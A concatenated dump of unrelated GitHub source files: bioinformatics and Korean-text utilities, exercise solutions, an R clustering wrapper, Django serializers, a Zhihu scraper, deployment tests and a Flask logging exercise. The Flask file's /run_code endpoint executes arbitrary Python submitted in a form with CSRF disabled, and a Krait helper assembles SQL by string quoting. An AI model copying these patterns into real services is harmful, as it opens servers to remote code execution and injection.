        return j2hcj(h2j(self.word[-1]))[-1]
    def _build(self, vowel_list):
        # a syllable with no final consonant decomposes to a vowel last
        if self.jongsung in vowel_list:
            self.vowel, self.liquid = True, True
        elif self.jongsung == 'ㄹ':
            self.liquid = True
| storidient/Act2Emo_baseline | utils.py | utils.py | py | 1,684 | python | en | code | 0 | github-code | 13 |
41604769366 | #-*- coding: utf-8 -*-
import csv
import gzip
import time
from jinja2 import Environment, FileSystemLoader
from libs import *
from config import *
class Data(dict):
    """Dictionary with attribute-style access: d.key <-> d['key']."""

    def __getattr__(self, name):
        # only called for names not found the normal way, so a plain
        # membership test is enough
        if name in self:
            return self[name]
        raise AttributeError(name)

    def __setattr__(self, name, val):
        self[name] = val
def abundant_motifs(rows):
    """Keep the header row plus, for each run of rows sharing a motif
    length, the five first rows after sorting by (motif, -count).

    Assumes the body rows are ordered by non-decreasing motif length.
    """
    header, body = rows[0], rows[1:]
    # boundaries: positions where the motif gets longer than any seen so far
    bounds = []
    longest = 0
    for pos, entry in enumerate(body):
        if len(entry[0]) > longest:
            bounds.append(pos)
            longest = len(entry[0])
    bounds.append(len(body))
    result = [header]
    for lo, hi in zip(bounds, bounds[1:]):
        group = sorted(body[lo:hi], key=lambda e: (e[0], -e[1]))
        result.extend(group[:5])
    return result
def time_format(dt):
    """Format a unix timestamp as 'YYYY-mm-dd HH:MM:SS' in local time;
    None becomes an empty string."""
    if dt is None:
        return ''
    return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(dt))
def used_format(dt):
    """Render a duration in seconds as e.g. '1h 2min 3s'; zero gives '0s'
    and zero-valued components are omitted."""
    if dt == 0:
        return "0s"
    hours, remainder = divmod(dt, 3600)
    minutes, seconds = divmod(remainder, 60)
    pieces = []
    if int(hours):
        pieces.append("%sh" % int(hours))
    if int(minutes):
        pieces.append("%smin" % int(minutes))
    if int(seconds):
        pieces.append("%ss" % int(seconds))
    return " ".join(pieces)
# Jinja2 environment for the report templates; the formatting helpers
# above are registered as template filters.
env = Environment(loader=FileSystemLoader(TEMPLATE_DIR))
env.filters['time_format'] = time_format
env.filters['used_format'] = used_format
env.filters['abundant_motifs'] = abundant_motifs
def template_render(template_name, **kwargs):
    """Render the named Jinja2 template with the given context."""
    template = env.get_template(template_name)
    return template.render(**kwargs)
def format_to_gff(feature, row):
    """Build one GFF3 record (as a list of columns) for a result row.

    row appears to be a project record exposing sequence/start/end/motif
    attributes plus getKeys()/value() for the remaining fields -- TODO
    confirm against libs.
    """
    cols = [row.sequence, 'Krait', feature, row.start, row.end, '.', '+', '.', []]
    cols[-1].append("ID={}{}".format(feature, row.id))
    cols[-1].append("Motif={}".format(row.motif))
    for k in row.getKeys():
        if k not in ['id', 'sequence', 'start', 'end', 'motif']:
            cols[-1].append("{}={}".format(k.capitalize(), row.value(k)))
    # collapse the attribute list into the final GFF attributes column
    cols[-1] = ";".join(cols[-1])
    return cols
def write_to_gtf(gtf_file, feature, cursor):
    """Write every row from `cursor` to `gtf_file` in GTF v2 format,
    one record per row, with a two-line version/generator header."""
    with open(gtf_file, 'w') as gtf:
        gtf.write("#!gtf-version 2\n")
        gtf.write("#!generated by Krait %s\n" % VERSION)
        for row in cursor:
            cols = [row.sequence, 'Krait', feature, row.start, row.end, '.', '+', '.', []]
            cols[-1].append('gene_id "%s%s"' % (feature, row.id))
            cols[-1].append('transcript_id "%s%s"' % (feature, row.id))
            cols[-1].append('motif "%s"' % row.motif)
            for k in row.getKeys():
                if k not in ['id', 'sequence', 'start', 'end', 'motif']:
                    cols[-1].append('%s "%s"' % (k, row.value(k)))
            # GTF attributes are '; '-separated key "value" pairs
            cols[-1] = "; ".join(cols[-1])
            gtf.write("\t".join(map(str, cols))+'\n')
def format_sql_where(conditions):
    """Quote non-numeric literals in a simple space-separated SQL WHERE
    fragment, e.g. "motif = AT" -> "motif = 'AT'" and
    "seq in (a,b)" -> "seq in ('a','b')"."""
    symbols = ['>=', '<=', '>', '<', '=', ' in ']
    conditions = conditions.split()
    for idx, cond in enumerate(conditions):
        if cond == 'in':
            # quote every element of the IN list unless the first one
            # is numeric (lists are assumed homogeneous)
            items = conditions[idx+1].strip('()').split(',')
            if not items[0].isdigit():
                conditions[idx+1] = "(%s)" % ",".join(map(lambda x: "'%s'" % x, items))
            continue
        if cond in symbols:
            # operator stands alone: quote the following operand
            if not conditions[idx+1].isdigit():
                conditions[idx+1] = "'%s'" % conditions[idx+1]
            continue
        for symbol in symbols:
            # operator glued to its operands, e.g. "length>=10"
            # (' in ' can never match here since tokens contain no spaces)
            if symbol in cond:
                res = cond.split(symbol)
                if not res[1].isdigit():
                    res[1] = "'%s'" % res[1]
                conditions[idx] = "%s%s%s" % (res[0], symbol, res[1])
    return " ".join(conditions)
def format_fasta_sequence(sequence, length):
    """Wrap `sequence` to `length`-character lines and append a trailing
    blank line, mirroring FASTA body formatting."""
    pieces = []
    for pos, residue in enumerate(sequence, start=1):
        pieces.append(residue)
        if pos % length == 0:
            pieces.append('\n')
    pieces.append('\n')
    return "".join(pieces)
'''
def gff_gtf_parser(annot_file, _format='GFF'):
"""
parse GFF, GTF, comparessed gz annotation file
"""
if annot_file.endswith('.gz'):
fh = gzip.open(annot_file, 'rt')
else:
fh = open(annot_file)
for line in fh:
if line[0] == '#': continue
cols = line.strip().split('\t')
record = Data(
seqid = cols[0],
feature = cols[2].upper(),
start = int(cols[3]),
end = int(cols[4]),
attrs = Data()
)
for item in cols[-1].split(';'):
if not item:
continue
if _format == 'GFF':
name, value = item.split('=')
else:
name, value = item.strip().strip('"').split('"')
record.attrs[name.strip()] = value
yield record
fh.close()
def get_gtf_coordinate(gtf_file):
father = None
exons = []
for r in gff_gtf_parser(gtf_file, 'GTF'):
try:
gene_name = r.attrs.gene_name
except AttributeError:
gene_name = r.attrs.gene_id
meta = Data(
feature = r.feature,
gene_id = r.attrs.gene_id,
gene_name = gene_name,
)
if r.feature == 'CDS':
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'FIVE_PRIME_UTR':
meta.feature = '5UTR'
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'THREE_PRIME_UTR':
meta.feature = '3UTR'
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'UTR':
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'EXON':
meta.feature = 'exon'
mother = r.attrs.transcript_id
if father == mother:
exons.append((r.seqid, r.start, r.end, meta))
else:
if exons:
exons = sorted(exons, key=lambda x: x[1])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
exons = [(r.seqid, r.start, r.end, meta)]
father = mother
if exons:
exons = sorted(exons, key=lambda x: x[1])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
def get_gff_coordinate(gff_file):
father = None
exons = []
parents = {}
for r in gff_gtf_parser(gff_file, 'GFF'):
if r.feature == 'REGION':
continue
elif r.feature == 'GENE':
if 'ID' in r.attrs:
parents[r.attrs.ID] = r.attrs.ID
elif 'GENE' in r.attrs:
parents[r.attrs.GENE] = r.attrs.GENE
parents['gene-{}'.format(r.attrs.GENE)] = r.attrs.GENE
elif 'NAME' in r.attrs:
parents[r.attrs.NAME] = r.attrs.NAME
elif r.feature == 'CDS':
meta = Data(
feature = r.feature,
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'FIVE_PRIME_UTR':
meta = Data(
feature = '5UTR',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'THREE_PRIME_UTR':
meta = Data(
feature = '3UTR',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'UTR':
meta = Data(
feature = 'UTR',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
yield (r.seqid, r.start, r.end, meta)
elif r.feature == 'EXON':
try:
mother = r.attrs.Parent
except AttributeError:
continue
meta = Data(
feature = 'exon',
gene_id = parents[r.attrs.Parent].attrs.ID,
gene_name = parents[r.attrs.Parent].attrs.Name,
)
if father == mother:
exons.append((r.seqid, r.start, r.end, meta))
else:
if exons:
exons = sorted(exons, key=lambda x: x[2])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
exons = [(r.seqid, r.start, r.end, meta)]
father = mother
else:
if 'ID' in r.attrs:
try:
parents[r.attrs.ID] = parents[r.attrs.Parent]
except:
parents[r.attrs.ID] = r.attrs.ID
exons = sorted(exons, key=lambda x: x[2])
intron_chrom = exons[0][0]
intron_meta = exons[0][3]
intron_meta.feature = 'intron'
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (intron_chrom, start, end, intron_meta)
'''
def get_ssr_sequence(seq_file, seq_name, start, stop, flank):
	'''
	Fetch an SSR sequence together with its flanking sequences.
	@para seq_file, path of the fasta sequence file
	@para seq_name, name of the sequence inside the fasta file
	@para start, 1-based start position of the SSR
	@para stop, 1-based stop position of the SSR
	@para flank, length of each flanking sequence
	@return rendered SSR sequence with flanking sequences
	'''
	fastas = fasta.Fasta(seq_file, sequence_always_upper=True)
	#the SSR itself (1-based inclusive coordinates -> python slice)
	ssr = fastas[seq_name][start-1:stop].seq
	#left flank, clamped at the beginning of the sequence
	#NOTE(review): the slice ends at ``start`` (exclusive, 0-based), so it
	#includes the SSR's first base -- confirm this overlap is intended.
	left_flank_start = max(start - flank - 1, 0)
	left_flank = fastas[seq_name][left_flank_start:start]
	seq_len = len(fastas[seq_name])
	#right flank, clamped at the end of the sequence
	right_flank_stop = min(stop + flank, seq_len)
	right_flank = fastas[seq_name][stop:right_flank_stop]
	highlighter = SequenceHighlighter()
	meta = '%s:%s-%s %s' % (seq_name, left_flank_start+1, start, len(left_flank))
	highlighter.format_flank(left_flank, meta)
	highlighter.format_ssr(ssr)
	highlighter.format_flank(right_flank)
	return highlighter.render()
def human_size(size):
	"""Format a byte count as a short human readable string (B/KB/MB)."""
	for unit in ('B', 'KB'):
		if size < 1000:
			return '%s %s' % (round(size, 2), unit)
		size = size / 1024
	return '%s MB' % round(size, 2)
| lmdu/krait | src/utils.py | utils.py | py | 9,659 | python | en | code | 34 | github-code | 13 |
# SWEA 1289: count the minimum number of writes needed to turn an
# all-zero memory string into the given bit string.
n = int(input())
for case in range(1, n + 1):
    # The int() round-trip keeps the original behaviour of dropping leading
    # zeros; those zeros never add a transition because the counter starts
    # from an implicit leading "0" anyway.
    bits = str(int(input()))
    # One write is needed at every position whose bit differs from its
    # predecessor (the removed ``arr`` accumulator was never used).
    flips = sum(1 for prev, cur in zip("0" + bits, bits) if prev != cur)
    print('#%d %d' % (case, flips))
72514154898 | from rpy2deseq.rpy2utils import (
_importr,
_r_to_list,
_r_to_numpy,
_pandas_to_r,
_numpy_to_r
)
import numpy as _np
import pandas as _pd
# Import stats
# Handle to R's built-in ``stats`` package (provides dist() and hclust()).
_stats = _importr('stats')

# Converters mapping each named component of R's hclust return value to a
# native Python object; applied one-by-one in hclust() below.
_hclust_converts = {
    'merge': _r_to_numpy,
    'height': _r_to_list,
    'order': lambda x: _np.array(_r_to_list(x)),
    'labels': lambda x: _np.array(_r_to_list(x)),
    'method': _r_to_list,
    'call': _r_to_list,
    'dist.method': _r_to_list
}
def hclust(mat, method="euclidean"):
    """
    Run R's hclust on a DataFrame or numpy array.

    :param mat: Data for clustering
    :type mat: pd.DataFrame, np.ndarray
    :param method: Distance metric, defaults to "euclidean"
    :type method: str, optional
    :return: Dict of hclust return values converted to python objects
    :rtype: dict
    """
    # Convert the input matrix to an R object; keep the DataFrame's index
    # around so it can be re-attached as labels afterwards.
    if isinstance(mat, _pd.DataFrame):
        r_matrix = _pandas_to_r(mat, as_matrix=True)
        row_labels = mat.index.tolist()
    else:
        r_matrix = _numpy_to_r(mat)
        row_labels = None

    # Distance matrix first, then hierarchical clustering.
    distances = _stats.dist(r_matrix, method=method)
    result = _stats.hclust(distances)

    # Translate every named component of the R result into Python.
    converted = {
        name: _hclust_converts[name](value)
        for name, value in zip(result.names, result)
    }

    # Prefer the original DataFrame index over R's labels when available.
    if row_labels is not None:
        converted['labels'] = row_labels
    return converted
| GreshamLab/rpy2deseq | rpy2deseq/hclust.py | hclust.py | py | 1,476 | python | en | code | 0 | github-code | 13 |
booked = [1, 3, 9, 12, 13, 18, 26, 27, 28, 29]
travel = [4, 5, 15, 16, 21, 22]
month = range(1, 31)

Busy = booked + travel
# Bug fix: the free days were previously computed twice -- a loop whose
# result was immediately overwritten by this comprehension.  Keep the
# single comprehension.
study = [day for day in month if day not in Busy]
print(study)
74229111378 | import os
import googlemaps
from datetime import datetime
from classes import Point
class GoogleMapsHelper:
    """Thin wrapper around the googlemaps client for travel-time queries."""

    # Divisors converting a duration in seconds into the requested unit.
    _UNIT_DIVISORS = {'hours': 3600, 'minutes': 60}

    def __init__(self):
        # API key is taken from the environment, never hard-coded.
        self.client = googlemaps.Client(key=os.environ['GOOGLE_API_KEY'])

    def time_between_points(self, origin, destination, unit='hours'):
        """Driving time from ``origin`` to ``destination`` (Point objects),
        departing now, expressed in ``unit`` ('hours', 'minutes', else
        seconds). Returns 0 when the response has no duration."""
        departure = datetime.now()
        directions = self.client.directions(origin.coords, destination.coords,
                                            mode="driving", departure_time=departure)
        factor = self._UNIT_DIVISORS.get(unit, 1)
        leg = directions[0]['legs'][0]
        try:
            return leg['duration']['value'] / factor
        except KeyError:
            return 0 / factor
| iaacosta/ics3213-g25 | services/GoogleMaps.py | GoogleMaps.py | py | 777 | python | en | code | 0 | github-code | 13 |
11874553115 | from rest_framework import serializers
from order.models import Order
from scan.models import ScanTable, ScanDetailsTable
class ScanTableSerializer(serializers.Serializer):
    """Validate and persist a ScanTable row for an order.

    Exactly one image source ends up stored: a non-empty ``scanImageUrl``
    wins, otherwise the uploaded ``scanImageRaw`` file is used.
    """
    order_id = serializers.IntegerField()
    title = serializers.CharField()
    scanImageRaw = serializers.ImageField(allow_null=True, allow_empty_file=True, required=False)
    scanImageUrl = serializers.CharField(allow_blank=True, required=False)

    def save(self, **kwargs):
        # Update the existing scan for this order if there is one,
        # otherwise create a fresh row (one scan per order).
        try:
            scan = ScanTable.objects.get(order_id=self.validated_data['order_id'])
        except ScanTable.DoesNotExist:
            # Narrowed from a bare ``except``: anything other than a
            # missing row (MultipleObjectsReturned, DB errors, ...) should
            # surface instead of silently creating a duplicate.
            scan = ScanTable()
        order = Order.objects.get(id=self.validated_data['order_id'])
        scan.order = order
        scan.title = self.validated_data['title']
        if 'scanImageUrl' in self.validated_data and self.validated_data['scanImageUrl'] != '':
            scan.scanImageUrl = self.validated_data['scanImageUrl']
            scan.scanImageRaw = None
        else:
            scan.scanImageUrl = None
            scan.scanImageRaw = self.validated_data['scanImageRaw']
        scan.save()
        return scan
class ScanDetailsTableSerializer(serializers.Serializer):
    """Validate and persist one ScanDetailsTable row attached to a scan.

    Stores either a non-empty detail-image URL or the uploaded raw image,
    never both.
    """
    scan_id = serializers.IntegerField()
    title = serializers.CharField()
    scanDetailImageRaw = serializers.ImageField(allow_null=True, allow_empty_file=True, required=False)
    scanDetailImageUrl = serializers.CharField(allow_blank=True, required=False)

    def save(self, **kwargs):
        data = self.validated_data
        detail = ScanDetailsTable()
        detail.scan = ScanTable.objects.get(id=data['scan_id'])
        detail.title = data['title']
        url = data.get('scanDetailImageUrl', '')
        if url != '':
            detail.scanDetailImageUrl = url
            detail.scanDetailImageRaw = None
        else:
            detail.scanDetailImageUrl = None
            detail.scanDetailImageRaw = data['scanDetailImageRaw']
        detail.save()
        return detail
| prettypanda0720-ww/Interior-Room-Design-Website-Django-and-React | scan/serializers.py | serializers.py | py | 2,104 | python | en | code | 0 | github-code | 13 |
40724859601 | #!/usr/bin/env python3
"""TLG NDE Python | LAncheta | Lists, Input, Print, Variables"""
def main():
    """Build the word bank for the list challenge, print and return it."""
    wordbank = ["indentation", "spaces"]
    # Bug fix: the original called an undefined ``wordbank_append(4)``
    # (NameError at runtime); the intent was the list method ``append``.
    wordbank.append(4)
    print(wordbank)
    # Student roster kept for later parts of the exercise (currently unused).
    tlgstudents = ["Aaron", "Andy", "Asif",
                   "Brent", "Cedric", "Chris",
                   "Cory", "Ebrima", "Franco",
                   "Greg", "Hoon", "Joey",
                   "Jordan", "JC", "LB",
                   "Mabel", "Shon", "Pat", "Zach"]
    return wordbank


if __name__ == "__main__":
    main()
| GaiusOctopus/mycode | challenge/listchallenge01.py | listchallenge01.py | py | 467 | python | en | code | 0 | github-code | 13 |
31267040182 | import os
from utils import euler_lib
def main():
    """Solve Project Euler 67: max path sum through the triangle file."""
    supplemental_dir = os.path.join(
        os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
        "supplemental")
    filepath = os.path.join(supplemental_dir, "p67_triangle.txt")
    with open(filepath, encoding='utf-8') as f:
        rows = [line.split() for line in f]
    # convert everything to ints for euler_lib max path math
    return euler_lib.get_triangle_max_path_sum(get_int_grid(rows))
def get_int_grid(t):
    """Return a copy of the row-of-strings grid *t* with every cell as int.

    Rewritten from a manual append loop to a nested comprehension.
    """
    return [[int(cell) for cell in row] for row in t]
if __name__ == "__main__":
    # Print the answer when the module is executed directly.
    print(main())
| stephendwillson/ProjectEuler | solutions/python/problem_67.py | problem_67.py | py | 706 | python | en | code | 0 | github-code | 13 |
40678801529 | # -*- coding: utf-8 -*-
"""AnyPyTools library."""
import sys
import platform
import logging
from anypytools.abcutils import AnyPyProcess, execute_anybodycon
from anypytools.macroutils import AnyMacro
from anypytools import macro_commands
logger = logging.getLogger('abt.anypytools')
logger.addHandler(logging.NullHandler())
__all__ = [
'datautils', 'h5py_wrapper', 'AnyPyProcess', 'AnyMacro', 'macro_commands',
'print_versions', 'execute_anybodycon',
]
__version__ = '0.10.10'
def print_versions():
"""Print all the versions of software that AnyPyTools relies on."""
import numpy as np
import scipy as sp
print("-=" * 38)
print("AnyPyTools version: %s" % __version__)
print("NumPy version: %s" % np.__version__)
print("SciPy version: %s" % sp.__version__)
print("Python version: %s" % sys.version)
(sysname, nodename, release, version, machine, processor) = \
platform.uname()
print("Platform: %s-%s-%s (%s)" % (sysname, release, machine, version))
if sysname == "Linux":
print("Linux dist: %s" % " ".join(platform.linux_distribution()[:-1]))
if not processor:
processor = "not recognized"
print("Processor: %s" % processor)
print("Byte-ordering: %s" % sys.byteorder)
print("-=" * 38)
| sebastianskejoe/AnyPyTools | anypytools/__init__.py | __init__.py | py | 1,286 | python | en | code | null | github-code | 13 |
24150317194 | """
Ещё раз рассмотрим Flask endpoint, принимающий код на питоне и исполняющий его.
1. Напишите для него Flask error handler,
который будет перехватывать OSError и писать в log файл exec.log
соответствую ошибку с помощью logger.exception
2. Добавьте отдельный exception handler
3. Сделайте так, что в случае непустого stderr (в программе произошла ошибка)
мы писали лог сообщение с помощью logger.error
4. Добавьте необходимые debug сообщения
5. Инициализируйте basicConfig для записи логов в stdout с указанием времени
"""
import logging
import shlex
import subprocess
from typing import Optional
from flask import Flask
from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField
from wtforms.validators import InputRequired
# Module-wide logger; handlers and level are configured under __main__.
logger = logging.getLogger("exec")
app = Flask(__name__)
class CodeForm(FlaskForm):
    # Python source code to execute (required field).
    code = StringField(validators=[InputRequired()])
    # Subprocess timeout in seconds for the submitted code.
    timeout = IntegerField(default=10)
def run_python_code_in_subprocess(code: str, timeout: int) -> str:
    """Run *code* in a separate python3 process and return its stdout.

    The argument vector is passed straight to Popen: the previous
    ``f'python3 -c "{code}"'`` + ``shlex.split`` round-trip broke (and
    allowed argument injection) as soon as the code contained quotes.
    """
    command = ["python3", "-c", code]
    process = subprocess.Popen(
        command,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    logger.debug("run cdm")
    try:
        outs, errs = process.communicate(timeout=timeout)
    except subprocess.TimeoutExpired:
        # Kill and reap the child before propagating (the pattern the
        # subprocess docs recommend); otherwise it is left running.
        process.kill()
        process.communicate()
        raise
    logger.debug(f"End {process.pid} , exit code {process.returncode}")
    if process.returncode != 0:
        # Non-zero and negative (killed by signal) exits are both failures.
        logger.error(f"{errs.decode(encoding='utf-8')}")
    else:
        logger.debug(f"{outs.decode(encoding='utf-8')}")
    return outs.decode()
@app.route("/run_code", methods=["POST"])
def run_code():
    """POST /run_code: validate the form, execute the snippet, report stdout."""
    form = CodeForm()
    if not form.validate_on_submit():
        logger.debug("Form is not valid")
        return f"Bad request. Error = {form.errors}", 400
    logger.debug("form is valid")
    stdout = run_python_code_in_subprocess(
        code=form.code.data,
        timeout=form.timeout.data,
    )
    return f"Stdout: {stdout}"
@app.errorhandler(OSError)
def handle_exception(e: OSError):
    """Log any OSError that escapes a view and return a 500 response.

    Bug fix: the previous version only logged when Flask attached an
    ``original_exception`` attribute, so a plain OSError raised inside a
    view was silently dropped -- and the handler returned ``None``, which
    is not a valid Flask response.
    """
    logger.exception(f"{e}")
    return "Internal server error", 500
if __name__ == "__main__":
    # NOTE(review): the exercise asks for basicConfig writing to *stdout*
    # with timestamps, but ``filename="exec.log"`` sends records to a file
    # instead -- confirm which destination is intended.
    logging.basicConfig(level=logging.DEBUG, filename="exec.log", format='%(asctime)s %(message)s')
    # CSRF is disabled so the form can be posted without a token in tests.
    app.config["WTF_CSRF_ENABLED"] = False
    logger.debug("Start")
    app.run(debug=True)
| ilnrzakirov/Python_advanced | module_06_debugging_begin/hw/hw_2_execute_code_from_form.py | hw_2_execute_code_from_form.py | py | 2,703 | python | ru | code | 0 | github-code | 13 |
def fibonachi(num_pos, chek=2, start=0, res=1):
    """Return the Fibonacci number at 1-based position ``num_pos``.

    ``chek``/``start``/``res`` are internal accumulators threaded through
    the tail-recursive calls; callers only pass ``num_pos``.
    """
    if num_pos == 1:
        return 1
    if chek == num_pos:
        return res + start
    # Shift the accumulator pair one position forward and recurse.
    return fibonachi(num_pos, chek + 1, res, res + start)
def fibonachi2(num_pos):
    """Naive doubly-recursive Fibonacci (1-based position)."""
    if num_pos in (1, 2):
        return 1
    return fibonachi2(num_pos - 2) + fibonachi2(num_pos - 1)
# Read the 1-based position from the user (prompt is user-facing runtime
# output and is left untranslated) and print that Fibonacci number.
num_pos = int(input("Введите номер позиции: "))
print(fibonachi2(num_pos))
# зачёт!  ("passed!" -- the reviewer's sign-off)
| ilnrzakirov/Python_basic | Module21/03_fibonacci/main.py | main.py | py | 883 | python | ru | code | 0 | github-code | 13 |
10310267190 | # --*-- coding:utf-8 --*--
# @Time : 2020/12/8 14:52
# @Author : 啊。懋勋
# @version: Python 3.7
# @File : zhihu_question.py
from selenium import webdriver
import time
from lxml import etree
import pymysql
import os
# Connect to the local MySQL database that stores the scraped answers.
conn = pymysql.connect('localhost', 'root', 'root', 'zhuhu_question')
cursor = conn.cursor()

driver = webdriver.Chrome()
driver.get('https://www.zhihu.com/question/294701927/answer/1615170394')
# Dismiss the login modal that covers the page.
driver.find_element_by_xpath("//button[@class='Button Modal-closeButton Button--plain']").click()
try:
    # Expand from the single-answer view to the full answer list, if shown.
    driver.find_element_by_xpath("//a[@class='QuestionMainAction ViewAll-QuestionMainAction']").click()
except Exception:
    pass
driver.execute_script("window.scrollTo(0, document.body.scrollHeight)")
time.sleep(2)
# Keep scrolling so Zhihu lazy-loads more answers.
for scroll_offset in range(0, 200000, 1500):
    driver.execute_script('window.scrollBy(0, {})'.format(scroll_offset))
    time.sleep(2)
html = etree.HTML(driver.page_source)
contents = html.xpath('//div[@class="List-item"]')
driver.quit()

# Security fix: author names and answer bodies are untrusted scraped text,
# so the INSERT is parameterized instead of being built with .format()
# (which was both injectable and broken by embedded quotes).
insert_sql = "INSERT INTO 你觉得大学期间最恶心的事是什么 values(%s,%s)"
for item in contents:
    try:
        author_name = item.xpath('.//a[@class="UserLink-link"]/text()')[0]
    except IndexError:
        # Anonymous/alternate layout: the name lives in a span instead.
        author_name = item.xpath('.//span[@class="UserLink AuthorInfo-name"]/text()')[0]
    content = '\n'.join(item.xpath('.//span[@itemprop="text"]//text()'))
    try:
        cursor.execute(insert_sql, (author_name, content))
        conn.commit()
    except pymysql.Error:
        # Typically a duplicate row; skip it and keep scraping.
        continue
    print("作者:" + author_name + ':')
cursor.close()
conn.close()
import os
import tempfile
import unittest
from unittest.mock import call, patch

from deploy.config import new_config
from deploy.deploy_updated_job import create_job_from_savepoint
from deploy.deploy_updated_job import stop_job, update_existing_job
# Shapes a job record the way Flink's REST API returns it.
def job_dict(id, name, state, start_time):
    """Return a REST-API-shaped job dict."""
    return dict(jid=id, name=name, state=state, **{"start-time": start_time})
def get_test_config():
    """Shared config fixture used by the test cases in this module."""
    options = {
        "namespace": "ns",
        "job_name": "log-user",
        "sub_job_type": "RAW_LOG_USER",
        "new": True,
    }
    return new_config(options)
class UpdateExistingJobTest(unittest.TestCase):
    # Mock the print so our tests are not printing lines of code.
    # NOTE: @patch decorators apply bottom-up, so the *last* decorator
    # corresponds to the *first* mock parameter.
    @patch('builtins.print')
    @patch('deploy.deploy_updated_job.create_job_from_savepoint')
    @patch('deploy.deploy_updated_job.stop_job')
    def test_success(self, mock_stop_job, mock_create_job_from_savepoint, mock_print):
        """update_existing_job stops the running job, then recreates it
        from the savepoint path that stop_job reported."""
        s3_savepoint_path = "s3a://example/path"
        mock_stop_job.return_value = s3_savepoint_path
        stream_job_config_path = "~/some/k8/config.yaml"
        config = get_test_config()
        config = config._replace(new=False, stream_job_file=stream_job_config_path)
        # The savepoint path is propagated back to the caller.
        self.assertEqual(
            update_existing_job(job_dict("10", "log-user", "RUNNING", 1000), config),
            s3_savepoint_path)
        self.assertEqual(mock_stop_job.call_count, 1)
        mock_stop_job.assert_has_calls([call("ns", "10", False)])
        self.assertEqual(mock_create_job_from_savepoint.call_count, 1)
        # The new job must start from the savepoint produced by stop_job.
        copy_config = config._replace(start_from_savepoint="s3a://example/path")
        mock_create_job_from_savepoint.assert_has_calls([
            call("10", copy_config)
        ])
class StopJobTest(unittest.TestCase):
    # NOTE: @patch decorators apply bottom-up, so the *last* decorator
    # corresponds to the *first* mock parameter.
    @patch('builtins.print')
    @patch('deploy.deploy_updated_job.wait_for_savepoint')
    @patch('deploy.deploy_updated_job.async_stop_job')
    def test_success(self, mock_async_stop_job, mock_wait_for_savepoint, mock_print):
        """stop_job triggers an async stop and then waits for the
        resulting savepoint, returning its S3 path."""
        mock_async_stop_job.return_value = 'requestId1'
        s3_savepoint_path = "s3a://example/path"
        mock_wait_for_savepoint.return_value = s3_savepoint_path
        self.assertEqual(stop_job("ns", "jobId1", False), s3_savepoint_path)
        mock_async_stop_job.assert_has_calls([
            call("ns", "jobId1", False)
        ])
        # The wait must use the request id returned by the async stop.
        mock_wait_for_savepoint.assert_has_calls([
            call("ns", "jobId1", "requestId1")
        ])
    @patch('builtins.print')
    @patch('deploy.deploy_updated_job.wait_for_savepoint')
    @patch('deploy.deploy_updated_job.async_stop_job')
    def test_dry_run(self, mock_async_stop_job, mock_wait_for_savepoint, mock_print):
        """In dry-run mode a fake savepoint path is returned and no
        savepoint wait happens."""
        mock_async_stop_job.return_value = 'requestId1'
        self.assertEqual(stop_job("ns", "jobId1", True), "s3://fake-path/for/dry/run")
        mock_async_stop_job.assert_has_calls([
            call("ns", "jobId1", True)
        ])
        mock_wait_for_savepoint.assert_not_called()
class CreateJobFromSavepointTest(unittest.TestCase):
    # Mock the print so our tests are not printing lines of code.
    # NOTE: @patch decorators apply bottom-up, so the *last* decorator
    # corresponds to the *first* mock parameter.
    @patch('builtins.print')
    @patch('deploy.deploy_updated_job.wait_for_flink_job')
    @patch('deploy.deploy_updated_job.subprocess_kubernetes_delete_then_apply')
    @patch('deploy.deploy_updated_job.create_modified_kubernetes_config')
    def test_success(self,
                     mock_create_modified_kubernetes_config,
                     mock_subprocess_kubernetes_delete_then_apply,
                     mock_wait_for_flink_job,
                     mock_print):
        """create_job_from_savepoint renders a modified k8s config,
        applies it, then waits for the Flink job to come up."""
        original_fp = tempfile.NamedTemporaryFile(delete=False)
        # delete=False keeps the file available to the code under test, so
        # remove it again when the test finishes (previously these files
        # leaked on every run).
        self.addCleanup(os.unlink, original_fp.name)
        with open(original_fp.name, 'w') as f:
            f.write("original")
        new_fp = tempfile.NamedTemporaryFile(delete=False)
        self.addCleanup(os.unlink, new_fp.name)
        with open(new_fp.name, 'w') as f:
            f.write("new")
        config = get_test_config()
        config = config._replace(stream_job_file=original_fp.name, start_from_savepoint="s3a://example/path")
        mock_create_modified_kubernetes_config.return_value = new_fp.name

        create_job_from_savepoint("jobId1", config)

        self.assertEqual(mock_create_modified_kubernetes_config.call_count, 1)
        mock_create_modified_kubernetes_config.assert_has_calls([call(config)])
        self.assertEqual(mock_subprocess_kubernetes_delete_then_apply.call_count, 1)
        mock_subprocess_kubernetes_delete_then_apply.assert_has_calls([call("ns", new_fp.name, False)])
        self.assertEqual(mock_wait_for_flink_job.call_count, 1)
